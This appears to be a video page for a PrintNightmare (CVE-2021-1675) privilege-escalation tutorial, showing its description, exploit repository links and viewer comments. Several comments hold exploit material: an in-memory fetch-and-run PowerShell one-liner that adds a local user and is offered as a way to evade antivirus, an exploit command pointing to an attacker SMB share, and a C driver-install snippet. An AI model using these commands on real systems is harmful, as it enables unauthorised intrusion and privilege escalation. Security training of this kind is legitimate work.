Abusing PrintNightmare (CVE-2021-1675) - Local Privilege Escalation
Published 2021-07-05
Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.
GitHub resources mentioned in this video:
github.com/calebstewart/CVE-2021-1675
github.com/cube0x0/CVE-2021-1675
Part Two:
• Abusing PrintNightmare RCE (CVE-2021-...
00:00 - Intro
00:50 - Exploits on Github
02:50 - Reviewing Environment
05:40 - Running Exploit
10:00 - Mitigation
All Comments (13)
-
Part 2, showing Remote Code Execution against a Domain Controller, will be available today at 2 PM PDT - check the link in the description!
-
Best explanation so far
-
One thing I would like to see within your channel is AV evasion and stuff like that. Anyway, it's great to watch your videos.
-
Nice explanation. Can the next video be about Kerberos delegations?
-
cool
-
When you run the script, do you have the "Point and Print" GPO enabled? Thank you
-
When I tried to connect with user victim and password victim, it worked. However, when I tried to connect as a user that doesn't use a password, it didn't work. The command used: Python3 CVE........ domain/user:@ip victim '\\ipattacker\smb\*.dll ..... Now, I can't connect if the victim doesn't have a password.
-
This isn't going to have any problems with YouTube censorship =p. Thanks for the videos tho, been searching around for the PowerShell script for this
-
Note - copying and pasting the actual script and writing it to disk will get picked up by AV (Windows Defender), so keep it in memory and do this instead so that it doesn't get picked up: iex(iwr https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -UseBasicParsing); Invoke-Nightmare -NewUser "User1" -NewPassword "password123" -DriverName "PrintMe" :) hope that helps
-
Is this really your typing speed? How many words per minute are you typing? LOL
-
While PS seems like a good idea, avoiding Linux, you'd be leaving footprints with PS history ... this doesn't seem ideal to me ...
-
Everyone says it works on all versions of Windows, BUT IT DOESN'T WORK ON WINDOWS 7! This: DRIVER_INFO_2W di = {}; di.cVersion = 3; di.pName = (LPWSTR)L"1111"; di.pEnvironment = (LPWSTR)L"Windows x64"; di.pDataFile = (LPWSTR)DLL_PATH; di.pConfigFile = (LPWSTR)DLL_PATH; di.pDriverPath = (LPWSTR)L"C:\\Test\\UNIDRV.DLL"; AddPrinterDriverExW(0, 2, (PBYTE) & di, 0); This gives error 5 on Win7; on Win10 before 21H2 it works.